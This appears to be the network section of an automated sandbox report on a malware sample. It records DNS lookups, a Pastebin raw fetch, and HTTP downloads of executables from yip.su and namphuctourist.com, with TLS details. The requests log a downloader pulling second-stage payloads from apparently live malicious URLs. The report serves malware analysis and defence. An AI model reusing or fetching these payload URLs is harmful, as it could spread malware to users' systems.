Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
namphuctourist.com | 103.28.36.182 | |
raw.githubusercontent.com | 185.199.110.133 | |
pastebin.com | 172.67.19.24 | |
yip.su | 172.67.169.89 | |
GET 200 https://pastebin.com/raw/E0rY26ni
REQUEST
GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2024 22:39:48 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 22 Jul 2024 12:10:21 GMT
Server: cloudflare
CF-RAY: 8a76edc5484829d2-FUK
GET 200 https://yip.su/RNWPd.exe
REQUEST
GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2024 22:39:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.36197662353515625
expires: Mon, 22 Jul 2024 22:39:49 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 22 Jul 2024 22:36:32 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JNmkCQWbg3K9AjgPIcBv4ssWENAZb0f6hnGh2DbDRRfvqM2fC5r9aFsL%2FrhPPyNLw11KVlP1t%2BlgmlXVqQEqb37RPVgAFxez3IpAAIXNoLbKDfdYoPxJVs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8a76edc9cf0a0ccf-LAX
alt-svc: h3=":443"; ma=86400
GET 200 http://namphuctourist.com/tmp/1.exe
REQUEST
GET /tmp/1.exe HTTP/1.1
Host: namphuctourist.com
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2024 22:39:48 GMT
Server: Apache
Last-Modified: Mon, 22 Jul 2024 21:45:02 GMT
Accept-Ranges: bytes
Content-Length: 155648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.101:49165 -> 104.20.3.235:443 | C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | 82:49:c5:04:9a:bd:a9:c1:ab:4d:ff:95:b9:94:74:cc:40:bc:09:7f |
TLS 1.2 192.168.56.101:49167 -> 185.199.111.133:443 | C=US, O=DigiCert Inc, CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 97:d8:c5:70:0f:12:24:6c:88:bc:fa:06:7e:8c:a7:4d:a8:62:67:28 |
TLS 1.2 192.168.56.101:49166 -> 172.67.169.89:443 | C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | cd:f2:dd:c5:ee:57:d1:5f:01:8c:10:00:ac:b5:85:96:0e:f7:0a:32 |
Snort Alerts
No Snort Alerts